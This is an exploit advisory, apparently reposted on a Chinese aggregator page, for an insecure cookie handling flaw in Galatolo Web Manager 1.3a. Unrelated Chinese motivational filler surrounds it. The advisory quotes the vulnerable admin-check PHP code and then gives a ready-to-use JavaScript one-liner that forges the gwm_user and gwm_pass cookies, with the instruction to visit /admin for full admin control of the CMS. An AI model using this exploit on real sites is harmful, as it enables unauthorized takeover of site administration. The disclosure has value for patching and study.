Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability

昨天越来越多,明天越来越少。走过的路长了,遇见的人多了,不经意间发现,人生最曼妙的风景是内心的淡定与从容,头脑的睿智与清醒。
############################################################################################
# #
# ...:::::Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability ::::.... #
############################################################################################

Virangar Security Team

www.virangar.net
www.virangar.ir

--------
Discoverd By :virangar security team(hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
-------
DESCRIPTION:
Galatolo Web Manager, suffers from insecure cookie handling, when a admin login is successfull the script creates
a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt
contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are
logged in as a legit admin.
---
vuln code in /Admin/index.php:

if (grado($HTTP_COOKIE_VARS["gwm_user"],$HTTP_COOKIE_VARS["gwm_pass"]) == "admin" || grado($HTTP_COOKIE_VARS["gwm_user"],$HTTP_COOKIE_VARS["gwm_pass"]) == "editor" ){
top();
menu();
echo $wellcome_admin;
foot();
}

---
exploit:
javascript:document.cookie = "gwm_user=admin; path=/"; document.cookie = "gwm_pass=admin; path=/";
-----
now visit /admin and you can get admin access and manage the cms ;)
-------
young iranian h4ck3rz

本文Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability 到此结束。追求,是人的一生不论怎样都离不开的一种东西,他触摸不到,却深深潜藏在每个人的内心里,让每个人的心灵都随时都保持着活力,也让每个人在迈向成功的路上多了一种坚不可摧的信念。为什么要前进,因为有追求,为什么要成功,因为有梦想,心中揣有梦想,敢于追求,才能不惧千山万险,敢于追求,才能无人可挡。小编再次感谢大家对我们的支持!